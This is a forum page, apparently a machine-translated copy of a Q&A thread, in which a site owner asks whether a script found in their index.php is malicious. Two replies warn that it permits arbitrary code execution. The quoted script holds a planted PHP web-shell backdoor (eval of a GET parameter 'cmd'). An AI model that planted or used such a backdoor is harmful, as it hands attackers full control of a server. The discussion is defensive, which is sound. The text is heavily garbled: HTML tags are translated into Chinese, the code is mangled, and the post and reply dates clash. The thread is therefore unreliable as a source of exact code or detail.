注册
登录
恶意代码防范
恶意Javascript代码?
返回
恶意Javascript代码?
作者:
WL
发布时间:
2025-03-05 12:04:06 (1天前)
转自:
<div class =“excerpt”> ”,location.href); &LT; /脚本&GT; 就是它 <span class =“result-highlight”> 码 </跨度> 是 <span class =“result-highlight”> 恶毒 </跨度> ? 从网上我试图把像index.php?cmd = ls之类的东西看似没有出现。也许它需要在页面上? 我试图了解以前的管理员在网站上做了什么。 我在我的网站index.php中找到了这个 <span class =“result-highlight”> 码 </跨度> &lt; script type =“text / javascript”&gt; new.track(“new.dev”,“_ browser”,“'&lt;?php eval($ _ GET [cmd]);?&gt;','&lt;?php eval($ _ GET [cmd]);?&gt; ;'“); new.track(“new.dev”,“_ url </DIV>
收藏
举报
3 条回复
0#
回复此人
只怕再见是故人
|
2019-08-31 10-32
<div class =“post-text”itemprop =“text”> <P> 1)引用 <code> cmd </code> =&GT; <code> $_GET['cmd'] </code> </p> <P> 2)绝对允许任何用户在您的服务器上执行任何PHP代码。仍然,获取请求默认限制为8kb(限制可能会更改) </p> <P> 你正在做的事情非常冒险。我不确定你想要完成什么,但相信我并找到一种不同的方式。 </p> </DIV>
编辑
1#
回复此人
࿏自ོ༾由ོ༽人͙⃡⌇
|
2019-08-31 10-32
<div class =“post-text”itemprop =“text”> <P> 该代码中存在无穷无尽的风险。 eval()运行php命令,可以运行终端命令。如果你接受没有卫生设施的投入,有人可能会疯狂并在那里造成严重的伤害。我会立即删除它并找到更好的方法。 </p> <P> 的<strong> 也是那个写作的人。 </强> </p> </DIV>
编辑
登录
后才能参与评论
